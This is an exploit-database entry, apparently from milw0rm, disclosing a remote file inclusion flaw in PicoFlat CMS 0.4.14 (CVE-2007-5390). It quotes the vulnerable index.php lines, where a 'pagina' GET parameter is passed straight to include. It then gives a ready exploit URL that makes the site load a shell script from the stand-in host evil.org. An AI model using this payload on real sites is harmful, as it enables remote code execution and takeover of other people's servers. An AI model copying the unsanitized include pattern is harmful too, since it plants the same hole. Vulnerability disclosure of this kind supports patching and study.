EXPLOITS

PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion

Author: 0in
type: webapps
platform: php
port: 
date_added: 2007-10-10  
date_updated: 2016-10-20  
verified: 1  
codes: OSVDB-37686;CVE-2007-5390  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comPicoFlatCMS_18082007.0.4.5.tar.gz  

raw file: 4520.txt  

#PicoFlat CMS Remote file inclusion
#f0und bY 0in
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro
#Others: Joker186,Kaja,Wojto111,Rade0n
#And funny n00b-firends: Pucik and Steryd ;]
FUN BUG in index.php:
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; }

107:   <?php  include $pagina; ?>

EXPLOIT:
http://x.com/index.php?pagina=http://evil.org/shell.txt?

# milw0rm.com [2007-10-11]